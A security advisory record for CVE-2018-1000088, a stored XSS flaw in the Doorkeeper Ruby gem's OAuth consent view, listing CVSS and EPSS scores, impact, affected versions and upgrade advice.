RubySecRUBY:DOORKEEPER-2018-1000088Doorkeeper gem has stored XSS on authorization consent view
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
50.3%
Stored XSS on the OAuth Client’s name will cause users being prompted for
consent via the “implicit” grant type to execute the XSS payload.
The XSS attack could gain access to the user’s active session, resulting in
account compromise.
Any user is susceptible if they click the authorization link for the
malicious OAuth client. Because of how the links work, a user cannot tell if
a link is malicious or not without first visiting the page with the XSS
payload.
If 3rd parties are allowed to create OAuth clients in the app using
Doorkeeper, upgrade to the patched versions immediately.
Additionally there is stored XSS in the native_redirect_uri form element.
DWF has assigned CVE-2018-1000088.
| CPE | Name | Operator | Version |
|---|---|---|---|
| doorkeeper | lt | 2.1.0 | |
| doorkeeper | lt | 4.2.6 |
Related
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
50.3%